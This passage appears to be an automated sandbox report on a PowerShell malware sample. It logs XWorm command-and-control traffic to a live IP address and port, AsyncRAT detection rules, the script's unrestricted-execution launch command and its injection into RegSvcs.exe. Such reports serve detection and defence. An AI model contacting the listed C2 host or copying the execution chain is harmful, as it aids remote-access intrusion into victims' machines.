Source:	Binary string: System.Windows.Forms.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdblX source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp, WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdbMZ source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb\mbqD0 source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb?U% source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegSvcs.exe, 00000003.00000002.3286181835.0000000004F60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD6CE.tmp.dmp.10.dr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 92.255.57.155:4411
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49730 -> 92.255.57.155:4411
Source: Network traffic	Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49730 -> 92.255.57.155:4411

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 92.255.57.155

Yara detected Generic Downloader

Source: Yara match

File source: 0.2.powershell.exe.1b599389800.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 92.255.57.155:4411

Source: Joe Sandbox View

IP Address: 92.255.57.155 92.255.57.155

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.155

Source: powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B980FA4	0_2_00007FFD9B980FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3E0A0	3_2_00B3E0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3406D	3_2_00B3406D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B38140	3_2_00B38140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36148	3_2_00B36148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3F288	3_2_00B3F288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B32349	3_2_00B32349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36423	3_2_00B36423
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B37600	3_2_00B37600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3C7D8	3_2_00B3C7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3E8A8	3_2_00B3E8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B37830	3_2_00B37830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36A28	3_2_00B36A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B37A18	3_2_00B37A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3FB02	3_2_00B3FB02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36E28	3_2_00B36E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B30F88	3_2_00B30F88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3BF08	3_2_00B3BF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3E091	3_2_00B3E091
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3613B	3_2_00B3613B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B38125	3_2_00B38125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B35150	3_2_00B35150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B35140	3_2_00B35140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B342E8	3_2_00B342E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B342DB	3_2_00B342DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36267	3_2_00B36267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B375F0	3_2_00B375F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B35550	3_2_00B35550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B35540	3_2_00B35540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B346B0	3_2_00B346B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B366A0	3_2_00B366A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B346A0	3_2_00B346A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B336E0	3_2_00B336E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B336D0	3_2_00B336D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3F750	3_2_00B3F750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3F741	3_2_00B3F741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3E82F	3_2_00B3E82F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3E843	3_2_00B3E843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36A18	3_2_00B36A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B3BBC0	3_2_00B3BBC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B32B50	3_2_00B32B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B32B40	3_2_00B32B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B34DA8	3_2_00B34DA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B34D9B	3_2_00B34D9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B36E18	3_2_00B36E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B30F00	3_2_00B30F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00B37F05	3_2_00B37F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D43410	3_2_04D43410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D42DE8	3_2_04D42DE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D406D0	3_2_04D406D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D40EF8	3_2_04D40EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D47948	3_2_04D47948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D40963	3_2_04D40963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48467	3_2_04D48467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D406C0	3_2_04D406C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48E50	3_2_04D48E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D40FAE	3_2_04D40FAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48ADF	3_2_04D48ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48A8A	3_2_04D48A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48A63	3_2_04D48A63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D483BF	3_2_04D483BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_04D48B1F	3_2_04D48B1F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736

Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.1b599389800.4.raw.unpack, -----------------------------------------.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winPS1@7/10@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnwuctoj.gsi.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 92.255.57.155.ps1	Virustotal: Detection: 8%
Source: 92.255.57.155.ps1	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: RegSvcs.exe, 00000003.00000002.3287746347.000000000A7FB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERD6CE.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.Management.ni.dll source: WERD6CE.tmp.dmp.10.dr
